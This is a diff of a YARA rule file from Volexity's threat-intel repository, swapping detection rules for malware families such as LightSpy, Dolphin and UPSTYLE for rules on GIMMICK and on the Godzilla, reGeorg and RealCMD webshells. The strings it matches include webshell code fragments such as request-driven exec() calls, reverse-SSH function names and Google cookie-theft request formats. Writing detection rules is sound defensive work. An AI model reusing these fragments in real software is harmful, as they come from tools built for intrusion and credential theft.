+		description = "Detects malicious documents used by LazyPine in a campaign dropping the AppleJeus malware."
 		author = "threatintel@volexity.com"
-		id = "6816d264-4311-5e90-948b-2e27cdf0b720"
-		date = "2024-03-28"
-		modified = "2024-07-05"
-		reference = "TIB-20240229"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L216-L243"
+		id = "f9a92f47-aa1d-56ea-ac59-47cc559f379f"
+		date = "2022-11-02"
+		modified = "2025-05-21"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-12-01 Buyer Beware - Fake Cryptocurrency Applications Serving as Front for AppleJeus Malware/yara.yar#L141-L165"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "22b3e5109d0738552fbc310344b2651ab3297e324bc883d5332c1e8a7a1df29b"
+		logic_hash = "54d5396b889a45d81122301eadf77f73135937fbe9647ad60491ac7856faf5ad"
 		score = 75
 		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "de32e96d1f151cc787841c12fad88d0a2276a93d202fc19f93631462512fffaf"
+		tags = "LAZYPINE, FILE"
+		hash1 = "17e6189c19dedea678969e042c64de2a51dd9fba69ff521571d63fd92e48601b"
 		os = "all"
 		os_arch = "all"
-		scan_context = "file,memory"
-		severity = "high"
+		scan_context = "file"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10390
-		version = 3
+		rule_id = 8490
+		version = 7
 
 	strings:
-		$s1 = "File is bigger than 8MB" wide ascii
-		$s2 = "Uploaded file to" wide ascii
-		$s3 = "sess-%d" wide ascii
-		$s4 = "Session *%s* opened" wide ascii
-		$s5 = "%s%d_%dx%d.png" wide ascii
+		$s1 = "0M8R4K" ascii
+		$s2 = "bin.base64" ascii
+		$s3 = "dragon" ascii
+		$s4 = "Workbook_Open" ascii
 
 	condition:
-		4 of them
+		all of ( $s* )
 }
-rule VOLEXITY_Malware_Golang_Discordc2_Bmdyy : FILE MEMORY
+rule VOLEXITY_Apt_Malware_Macos_Gimmick : STORMBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Detects a opensource malware available on github using strings in the binary. DISGOMOJI used by TransparentJasmine is based on this malware."
+		description = "Detects the macOS port of the GIMMICK malware."
 		author = "threatintel@volexity.com"
-		id = "1ddbf476-ba2d-5cbb-ad95-38e0ae8db71b"
-		date = "2024-02-22"
-		modified = "2024-07-05"
-		reference = "https://github.com/bmdyy/discord-c2"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-06-13 DISGOMOJI/indicators/rules.yar#L244-L267"
+		id = "3d485788-4aab-511b-a49e-5dc09d1950a9"
+		date = "2021-10-18"
+		modified = "2024-08-02"
+		reference = "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-03-22 GIMMICK/indicators/yara.yar#L1-L59"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "38b860a43b9937351f74b01983888f18ad101cbe66560feb7455d46b713eba0f"
+		logic_hash = "00fba9df2212874a45d44b3d098a7b76c97fcd53ff083c76b784d2b510a4a467"
 		score = 75
-		quality = 80
-		tags = "FILE, MEMORY"
-		hash1 = "d9f29a626857fa251393f056e454dfc02de53288ebe89a282bad38d03f614529"
-		os = "all"
+		quality = 78
+		tags = "STORMBAMBOO, FILE, MEMORY"
+		hash1 = "2a9296ac999e78f6c0bee8aca8bfa4d4638aa30d9c8ccc65124b1cbfc9caab5f"
+		os = "darwin"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10264
-		version = 12
+		rule_id = 6022
+		version = 8
 
 	strings:
-		$s1 = "**IP**: %s\n**User**: %s\n**Hostname**: %s\n**OS**: %s\n**CWD**" wide ascii
+		$s1 = "http://cgi1.apnic.net/cgi-bin/my-ip.php --connect-timeout 10 -m 20" wide ascii
+		$json1 = "base_json" ascii wide
+		$json2 = "down_json" ascii wide
+		$json3 = "upload_json" ascii wide
+		$json4 = "termin_json" ascii wide
+		$json5 = "request_json" ascii wide
+		$json6 = "online_json" ascii wide
+		$json7 = "work_json" ascii wide
+		$msg1 = "bash_pid: %d, FDS_CHILD: %d, FDS_PARENT: %d" ascii wide
+		$msg2 = "pid %d is dead" ascii wide
+		$msg3 = "exit with code %d" ascii wide
+		$msg4 = "recv signal %d" ascii wide
+		$cmd1 = "ReadCmdQueue" ascii wide
+		$cmd2 = "read_cmd_server_timer" ascii wide
+		$cmd3 = "enableProxys" ascii wide
+		$cmd4 = "result_block" ascii wide
+		$cmd5 = "createDirLock" ascii wide
+		$cmd6 = "proxyLock" ascii wide
+		$cmd7 = "createDirTmpItem" ascii wide
+		$cmd8 = "dowfileLock" ascii wide
+		$cmd9 = "downFileTmpItem" ascii wide
+		$cmd10 = "filePathTmpItem" ascii wide
+		$cmd11 = "uploadItems" ascii wide
+		$cmd12 = "downItems" ascii wide
+		$cmd13 = "failUploadItems" ascii wide
+		$cmd14 = "failDownItems" ascii wide
+		$cmd15 = "downloadCmds" ascii wide
+		$cmd16 = "uploadFiles" ascii wide
+		$cmd17 = "bash callback...." ascii wide
 
 	condition:
-		$s1
+		$s1 or 5 of ( $json* ) or 3 of ( $msg* ) or 9 of ( $cmd* )
 }
-rule VOLEXITY_Apt_Malware_Py_Upstyle : UTA0218 FILE MEMORY
+rule VOLEXITY_Apt_Malware_Win_Gimmick_Dotnet_Base : STORMBAMBOO FILE MEMORY
 {
 	meta:
-		description = "Detect the UPSTYLE webshell."
+		description = "Detects the base version of GIMMICK written in .NET."
 		author = "threatintel@volexity.com"
-		id = "45726f35-8b3e-5095-b145-9e7f6da6838b"
-		date = "2024-04-11"
-		modified = "2024-04-12"
-		reference = "TIB-20240412"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L1-L34"
+		id = "be42d85f-3143-51d3-b148-95d0ae666771"
+		date = "2020-03-16"
+		modified = "2024-08-19"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-03-22 GIMMICK/indicators/yara.yar#L60-L86"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "51923600b23d23f4ce29eac7f5ab9f7e1ddb45bed5f6727ddec4dcb75872e473"
+		logic_hash = "39a38ea189d5e840f9334cb7ec8f390444139b39c6f426906a8845f9a1ada9f7"
 		score = 75
 		quality = 80
-		tags = "UTA0218, FILE, MEMORY"
-		hash1 = "3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac"
-		hash2 = "0d59d7bddac6c22230187ef6cf7fa22bca93759edc6f9127c41dc28a2cea19d8"
-		hash3 = "4dd4bd027f060f325bf6a90d01bfcf4e7751a3775ad0246beacc6eb2bad5ec6f"
-		os = "linux"
+		tags = "STORMBAMBOO, FILE, MEMORY"
+		hash1 = "b554bfe4c2da7d0ac42d1b4f28f4aae854331fd6d2b3af22af961f6919740234"
+		os = "win"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10429
-		version = 2
+		rule_id = 6628
+		version = 3
 
 	strings:
-		$stage1_str1 = "/opt/pancfg/mgmt/licenses/PA_VM"
-		$stage1_str2 = "exec(base64."
-		$stage2_str1 = "signal.signal(signal.SIGTERM,stop)"
-		$stage2_str2 = "exec(base64."
-		$stage3_str1 = "write(\"/*\"+output+\"*/\")"
-		$stage3_str2 = "SHELL_PATTERN"
+		$other1 = "srcStr is null" wide
+		$other2 = "srcBs is null " wide
+		$other3 = "Key cannot be null" wide
+		$other4 = "Faild to get target constructor, targetType=" wide
+		$other5 = "hexMoudule(public key) cannot be null or empty." wide
+		$other6 = "https://oauth2.googleapis.com/token" wide
 
 	condition:
-		all of ( $stage1* ) or all of ( $stage2* ) or all of ( $stage3* )
+		5 of ( $other* )
 }
-rule VOLEXITY_Susp_Any_Jarischf_User_Path : FILE MEMORY
+rule VOLEXITY_Webshell_Jsp_Godzilla : FILE MEMORY
 {
 	meta:
-		description = "Detects paths embedded in samples in released projects written by Ferdinand Jarisch, a pentester in AISEC. These tools are sometimes used by attackers in real world intrusions."
+		description = "Detects the JSP implementation of the Godzilla Webshell."
 		author = "threatintel@volexity.com"
-		id = "062a6fdb-c516-5643-9c7c-deff32eeb95e"
-		date = "2024-04-10"
-		modified = "2024-04-15"
-		reference = "TIB-20240412"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L59-L81"
+		id = "47c8eab8-84d7-5566-b757-5a6dcc7579b7"
+		date = "2021-11-08"
+		modified = "2024-07-30"
+		reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L1-L34"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "574d5b1fadb91c39251600e7d73d4993d4b16565bd1427a0e8d6ed4e7905ab54"
-		score = 50
-		quality = 80
+		logic_hash = "52cba9545f662da18ca6e07340d7a9be637b89e7ed702dd58cac545c702a00e3"
+		score = 75
+		quality = 55
 		tags = "FILE, MEMORY"
-		hash1 = "161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6"
-		os = "all"
+		hash1 = "2786d2dc738529a34ecde10ffeda69b7f40762bf13e7771451f13a24ab7fc5fe"
+		os = "win,linux"
 		os_arch = "all"
 		scan_context = "file,memory"
-		severity = "high"
+		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10424
-		version = 4
+		rule_id = 6100
+		version = 6
 
 	strings:
-		$proj_1 = "/home/jarischf/"
+		$s1 = ".getWriter().write(base64Encode(" wide ascii
+		$s2 = ".getAttribute(" ascii wide
+		$s3 = "java.security.MessageDigest" ascii wide
+		$auth1 = /String xc=\"[a-f0-9]{16}\"/ ascii wide
+		$auth2 = "String pass=\"" ascii wide
+		$magic = "class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q"
+		$magic2 = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class"
 
 	condition:
-		any of ( $proj_* )
+		all of ( $s* ) or all of ( $auth* ) or any of ( $magic* )
 }
-rule VOLEXITY_Hacktool_Golang_Reversessh_Fahrj : FILE MEMORY
+rule VOLEXITY_Susp_Jsp_General_Runtime_Exec_Req : FILE MEMORY
 {
 	meta:
-		description = "Detects a reverse SSH utility available on GitHub. Attackers may use this tool or similar tools in post-exploitation activity."
+		description = "Looks for a common design pattern in webshells where a request attribute is passed as an argument to exec()."
 		author = "threatintel@volexity.com"
-		id = "332e323f-cb16-5aa2-8b66-f3d6d50d94f2"
-		date = "2024-04-10"
-		modified = "2024-04-12"
-		reference = "TIB-20240412"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L82-L116"
+		id = "7f1539bd-a2f0-50dd-b500-ada4e0971d13"
+		date = "2022-02-02"
+		modified = "2024-07-30"
+		reference = "https://github.com/volexity/threat-intel"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L35-L56"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "38b40cc7fc1e601da2c7a825f1c2eff209093875a5829ddd2f4c5ad438d660f8"
-		score = 75
+		logic_hash = "d3048aba80c1c39f1673931cd2d7c5ed83045603b0ad204073fd788d0103a6c8"
+		score = 65
 		quality = 80
 		tags = "FILE, MEMORY"
-		hash1 = "161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6"
-		os = "all"
+		hash1 = "4935f0c50057e28efa7376c734a4c66018f8d20157b6584399146b6c79a6de15"
+		os = "win,linux"
 		os_arch = "all"
 		scan_context = "file,memory"
-		severity = "critical"
+		severity = "high"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10423
-		version = 5
+		rule_id = 6450
+		version = 3
 
 	strings:
-		$fun_1 = "createLocalPortForwardingCallback"
-		$fun_2 = "createReversePortForwardingCallback"
-		$fun_3 = "createPasswordHandler"
-		$fun_4 = "createPublicKeyHandler"
-		$fun_5 = "createSFTPHandler"
-		$fun_6 = "dialHomeAndListen"
-		$fun_7 = "createExtraInfoHandler"
-		$fun_8 = "createSSHSessionHandler"
-		$fun_9 = "createReversePortForwardingCallback"
-		$proj_1 = "github.com/Fahrj/reverse-ssh"
+		$s1 = "Runtime.getRuntime().exec(request." ascii
 
 	condition:
-		any of ( $proj_* ) or 4 of ( $fun_* )
+		$s1
 }
-rule VOLEXITY_Apt_Malware_Win_Deepdata_Module : BRAZENBAMBOO FILE MEMORY
+rule VOLEXITY_Webshell_Jsp_Regeorg : FILE MEMORY
 {
 	meta:
-		description = "Detects modules used by DEEPDATA based on the required export names used by those modules."
+		description = "Detects the reGeorg webshells' JSP version."
 		author = "threatintel@volexity.com"
-		id = "1287f5dd-9229-57ce-a91a-73d61041df80"
-		date = "2024-07-30"
-		modified = "2024-11-14"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-11-15 BrazenBamboo/rules.yar#L1-L25"
+		id = "205ee383-4298-5469-a509-4ce3eaf9dd0e"
+		date = "2022-03-08"
+		modified = "2024-09-20"
+		reference = "https://github.com/SecWiki/WebShell-2/blob/master/reGeorg-master/tunnel.jsp"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-08-10 Mass exploitation of (Un)authenticated Zimbra RCE CVE-2022-27925/yara.yar#L57-L86"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "d36f34343826daf7f7368118c7127c7181a54c99a01803016c9a6965abb309cb"
+		logic_hash = "cecb71605d9112d509823c26e40e1cf9cd6db581db448db5c9ffc63a2bfe529e"
 		score = 75
 		quality = 80
-		tags = "BRAZENBAMBOO, FILE, MEMORY"
-		hash1 = "c782346bf9e5c08a0c43a85d4991f26b0b3c99c054fa83beb4a9e406906f011e"
+		tags = "FILE, MEMORY"
+		hash1 = "f9b20324f4239a8c82042d8207e35776d6777b6305974964cd9ccc09d431b845"
 		os = "win"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10868
-		version = 2
+		rule_id = 6575
+		version = 5
 
 	strings:
-		$str1 = "ExecuteCommand"
-		$str2 = "GetPluginCommandID"
-		$str3 = "GetPluginName"
-		$str4 = "GetPluginVersion"
+		$magic = "socketChannel.connect(new InetSocketAddress(target, port))" ascii
+		$a1 = ".connect(new InetSocketAddress" ascii
+		$a2 = ".configureBlocking(false)" ascii
+		$a3 = ".setHeader(" ascii
+		$a4 = ".getHeader(" ascii
+		$a5 = ".flip();" ascii
 
 	condition:
-		all of them
+		$magic or all of ( $a* )
 }
-rule VOLEXITY_Apt_Malware_Win_Lightspy_Orchestrator_Decoded_Core : BRAZENBAMBOO FILE MEMORY
+rule VOLEXITY_Webshell_Jsp_Converge : FILE MEMORY CVE_2022_26134
 {
 	meta:
-		description = "Detects the decoded orchestrator for the Windows variant of the LightSpy malware family. This file is normally stored in an encoded state on the C2 server and is used as the core component of this malware family, loading additional plugins from the C2 whilst managing all the C2 communication etc."
+		description = "Detects CONVERGE - a file upload webshell observed in incident involving compromise of Confluence server via CVE-2022-26134."
 		author = "threatintel@volexity.com"
-		id = "44f8d7a4-7f48-5960-91a7-baf475f7d291"
-		date = "2024-02-15"
-		modified = "2024-07-03"
+		id = "2a74678e-cb00-567c-a2e0-2e095f3e5ee8"
+		date = "2022-06-01"
+		modified = "2024-09-20"
 		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-11-15 BrazenBamboo/rules.yar#L244-L287"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-06-02 Active Exploitation Of Confluence 0-day/indicators/yara.yar#L1-L21"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "f0189c0a84c53e365130e9683f2f2b2f73c14412d8e4d0251a4780d0e80162d8"
+		logic_hash = "bb48516342eddd48c35e6db0eb74f95e116dc723503552b99ba721b5bdb391e5"
 		score = 75
-		quality = 78
-		tags = "BRAZENBAMBOO, FILE, MEMORY"
-		hash1 = "80c0cdb1db961c76de7e4efb6aced8a52cd0e34178660ef34c128be5f0d587df"
-		os = "win"
+		quality = 80
+		tags = "FILE, MEMORY, CVE-2022-26134"
+		os = "all"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10246
-		version = 2
+		rule_id = 6788
+		version = 5
 
 	strings:
-		$s1 = "Enter RunWork......."
-		$s2 = "it's running......."
-		$s3 = "select ret = socket_error."
-		$s4 = "%s\\\\account.bin"
-		$s5 = "[CtrlLink]: get machine sn err:%d"
-		$s6 = "wmic path Win32_VideoController get CurrentHorizontalResolution,CurrentVerticalResolution /format:list | findstr /v \\\"^$\\\""
-		$s7 = "wmic csproduct get vendor,version /format:list | findstr /v \\\"^$\\\""
-		$s8 = "local ip get sockname error=%d"
-		$s9 = "connect goole dns error=%d"
-		$s10 = "%s/api/terminal/upsert/"
-		$s11 = "/963852741/windows/plugin/manifest"
-		$s12 = "Hello deepdata."
-		$s13 = "Start Light."
-		$s14 = "InitialPluginManager Error."
-		$s15 = "InitialCommandExe Error."
-		$s16 = "ws open, and send logon info."
-		$s17 = "plugin_replay_handler"
-		$s18 = "light_x86.dll"
-		$pdb1 = "\\light\\bin\\light_x86.pdb"
-		$pdb2 = "\\light\\bin\\plugin"
-		$pdb3 = "D:\\tmpWork\\"
+		$s1 = "if (request.getParameter(\"name\")!=null && request.getParameter(\"name\").length()!=0){" ascii
 
 	condition:
-		1 of ( $pdb* ) or 5 of ( $s* )
+		$s1
 }
-rule VOLEXITY_Apt_Malware_Win_Lightspy_Orchestrator_Decoded_C2_Strings : BRAZENBAMBOO FILE MEMORY
+rule VOLEXITY_Webshell_Java_Realcmd : FILE MEMORY
 {
 	meta:
-		description = "Detects the decoded orchestrator for the Windows variant of the LightSpy malware family. This file is normally stored in an encoded state on the C2 server and is used as the core component of this malware family, loading additional plugins from the C2 whilst managing all the C2 communication etc."
+		description = "Detects the RealCMD webshell, one of the payloads for BEHINDER."
 		author = "threatintel@volexity.com"
-		id = "a0af8fb7-13a3-54e8-8569-e8622fa80d89"
-		date = "2024-02-15"
-		modified = "2024-11-14"
-		reference = "https://github.com/volexity/threat-intel"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2024/2024-11-15 BrazenBamboo/rules.yar#L288-L337"
+		id = "60b30ccc-bcfa-51e6-a3f5-88037d19213e"
+		date = "2022-06-01"
+		modified = "2024-07-30"
+		reference = "https://github.com/Freakboy/Behinder/blob/master/src/main/java/vip/youwe/sheller/payload/java/RealCMD.java"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2022/2022-06-02 Active Exploitation Of Confluence 0-day/indicators/yara.yar#L61-L84"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "eeaaf6e16d4854a2279bd62596f75cb8b8ec1b05f3b050f5dac97254704b9005"
+		logic_hash = "e09f2a23674fd73296dd4d1fabf1a2c812bfe69ff02abc96a4be35af6a18e512"
 		score = 75
-		quality = 78
-		tags = "BRAZENBAMBOO, FILE, MEMORY"
-		hash1 = "80c0cdb1db961c76de7e4efb6aced8a52cd0e34178660ef34c128be5f0d587df"
-		os = "win"
+		quality = 80
+		tags = "FILE, MEMORY"
+		hash1 = "a9a30455d6f3a0a8cd0274ae954aa41674b6fd52877fafc84a9cb833fd8858f6"
+		os = "all"
 		os_arch = "all"
 		scan_context = "file,memory"
 		severity = "critical"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 10245
+		rule_id = 6786
 		version = 4
 
 	strings:
-		$s1 = "[WsClient][Error]:"
-		$s2 = "[WsClient][Info]:"
-		$s3 = "[WsClient]:WsClient"
-		$s4 = "[WsClient][Info]:Ws"
-		$s5 = "WsClient Worker Thread ID=%d"
-		$s6 = "[LightWebClient]:"
-		$s7 = "LightHttpGet err:%s"
-		$s8 = "User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.145 Safari/537.36"
-		$s9 = "KvList Err:%s"
-		$s10 = "dataMultiPart malloc err:%d"
-		$ctrl1 = "CTRL_HEART_BEAT"
-		$ctrl2 = "CTRL_NET_CONFIG"
-		$ctrl3 = "CTRL_COMMAND_PLAN"
-		$ctrl4 = "CTRL_MODIFY_NET_CONFIG"
-		$ctrl5 = "CTRL_UPLOAD_PLUGIN_STATUS"
-		$ctrl6 = "CTRL_PLUGIN_EXECUTE_COMMAND"
-		$ctrl7 = "CTRL_PLUGIN_COMMAND_STATUS"
-		$ctrl8 = "CTRL_PLUGIN_STOP_COMMAND"
-		$ctrl9 = "CTRL_GET_SLEEP_CONFIG"
-		$ctrl10 = "CTRL_MODIFY_SLEEP_CONFIG"
-		$ctrl11 = "CTRL_SLEEP_STATUS"
-		$ctrl12 = "CTRL_UPDATE_PLUGIN"
-		$ctrl13 = "CTRL_DESTROY"
-		$ctrl14 = "CTRL_RECONFIG_REBOUNT_ADDRESS"
-		$ctrl15 = "CTRL_AUTO_UPLOUD_FILE_CONFIG"
-		$ctrl16 = "CTRL_UPLOUD_DEVICE_INFO"
-		$ctrl17 = "CTRL_TEST_VPDN_ACCOUNT"
+		$fn1 = "runCmd" wide ascii fullword
+		$fn2 = "RealCMD" ascii wide fullword
+		$fn3 = "buildJson" ascii wide fullword
 
 	condition:
-		3 of ( $s* ) or 5 of ( $ctrl* )
+		all of ( $fn* )
 }
-rule VOLEXITY_Apt_Malware_Win_Dolphin : INKYPINE FILE MEMORY
+rule VOLEXITY_Webshell_Aspx_Regeorgtunnel : FILE MEMORY
 {
 	meta:
-		description = "North Korean origin malware which uses a custom Google App for c2 communications."
+		description = "A variation of the reGeorgtunnel open-source webshell."
 		author = "threatintel@volexity.com"
-		id = "27bb2b41-f77d-5b95-b555-206c39ed9e6c"
-		date = "2021-06-21"
-		modified = "2025-01-27"
-		reference = "https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/"
-		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2021/2021-08-17 - InkySquid Part 1/indicators/yara.yar#L1-L77"
+		id = "b8aa27c9-a28a-5051-8f81-1184f28842ed"
+		date = "2021-03-02"
+		modified = "2024-10-18"
+		reference = "https://github.com/sensepost/reGeorg/blob/master/tunnel.aspx"
+		source_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/2021/2021-03-02 - Operation Exchange Marauder/indicators/yara.yar#L26-L56"
 		license_url = "https://github.com/volexity/threat-intel/blob/1ef34c2e4704d1e6e6768c2d6800863bbae05a0d/LICENSE.txt"
-		logic_hash = "785a92087efc816c88c6eed6363c432d8d45198fbd5cef84c04dabd36b6316a6"
+		hash = "406b680edc9a1bb0e2c7c451c56904857848b5f15570401450b73b232ff38928"
+		logic_hash = "ea3d0532cb609682922469e8272dc8061efca3b3ae27df738ef2646e30404c6f"
 		score = 75
-		quality = 55
-		tags = "INKYPINE, FILE, MEMORY"
-		hash1 = "837eaf7b736583497afb8bbdb527f70577901eff04cc69d807983b233524bfed"
+		quality = 80
+		tags = "FILE, MEMORY"
 		os = "win"
 		os_arch = "all"
 		scan_context = "file,memory"
-		severity = "critical"
+		severity = "high"
 		license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt"
-		rule_id = 5593
-		version = 10
+		rule_id = 4979
+		version = 4
 
 	strings:
-		$magic = "host_name: %ls, cookie_name: %s, cookie: %s, CT: %llu, ET: %llu, value: %s, path: %ls, secu: %d, http: %d, last: %llu, has: %d"
-		$f1 = "%ls.INTEG.RAW" wide
-		$f2 = "edb.chk" ascii
-		$f3 = "edb.log" ascii
-		$f4 = "edbres00001.jrs" ascii
-		$f5 = "edbres00002.jrs" ascii
-		$f6 = "edbtmp.log" ascii
-		$f7 = "cheV01.dat" ascii
-		$chrome1 = "Failed to get chrome cookie"
-		$chrome2 = "mail.google.com, cookie_name: OSID"
-		$chrome3 = ".google.com, cookie_name: SID,"
-		$chrome4 = ".google.com, cookie_name: __Secure-3PSID,"
-		$chrome5 = "Failed to get Edge cookie"
-		$chrome6 = "google.com, cookie_name: SID,"
-		$chrome7 = "google.com, cookie_name: __Secure-3PSID,"
-		$chrome8 = "Failed to get New Edge cookie"
-		$chrome9 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"
-		$chrome10 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8"
-		$chrome11 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s"
-		$chrome12 = "https://mail.google.com"
-		$chrome13 = "result.html"
-		$chrome14 = "GM_ACTION_TOKEN"
-		$chrome15 = "GM_ID_KEY="
-		$chrome16 = "/mail/u/0/?ik=%s&at=%s&view=up&act=prefs"
-		$chrome17 = "p_bx_ie=1"
-		$chrome18 = "myaccount.google.com, cookie_name: OSID"
-		$chrome19 = "Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3"
-		$chrome20 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8"
-		$chrome21 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s"
-		$chrome22 = "https://myaccount.google.com"
-		$chrome23 = "result.html"
-		$chrome24 = "myaccount.google.com"
-		$chrome25 = "/_/AccountSettingsUi/data/batchexecute"
-		$chrome26 = "f.req=%5B%5B%5B%22BqLdsd%22%2C%22%5Btrue%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&at="
-		$chrome27 = "response.html"
-		$msg1 = "https_status is %s"
-		$msg2 = "Success to find GM_ACTION_TOKEN and GM_ID_KEY"
-		$msg3 = "Failed to find GM_ACTION_TOKEN and GM_ID_KEY"
-		$msg4 = "Failed HttpSendRequest to mail.google.com"
-		$msg5 = "Success to enable imap"
-		$msg6 = "Failed to enable imap"
-		$msg7 = "Success to find SNlM0e"
-		$msg8 = "Failed to find SNlM0e"
-		$msg9 = "Failed HttpSendRequest to myaccount.google.com"
-		$msg10 = "Success to enable thunder access"
-		$msg11 = "Failed to enable thunder access"
+		$s1 = "System.Net.Sockets"
+		$s2 = "System.Text.Encoding.Default.GetString(Convert.FromBase64String(StrTr(Request.Headers.Get"
+		$t1 = ".Split('|')"
+		$t2 = "Request.Headers.Get"
+		$t3 = ".Substring("
+		$t4 = "new Socket("
+		$t5 = "IPAddress ip;"
 
 	condition:
-		$magic or ( all of ( $f* ) and 3 of ( $chrome* ) ) or 24 of ( $chrome* ) or 4 of ( $msg* )
+		all of ( $s* ) or all of ( $t* )
 }
-rule VOLEXITY_Apt_Malware_Win_Bluelight : INKYPINE FILE MEMORY
+rule VOLEXITY_Apt_Webshell_Aspx_Sportsball : FILE MEMORY
 {
 	meta:
-		description = "The BLUELIGHT malware family. Leverages Microsoft OneDrive for network communications."
+		description = "The SPORTSBALL webshell, observed in targeted Microsoft Exchange attacks."
 		author = "threatintel@volexity.com"
-		id = "5bfdc74b-592e-5f3d-9fb8-bbbbd0f6f0f6"
-		date = "2021-04-23"
-		modified = "2025-02-18"
-		reference = "https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/"
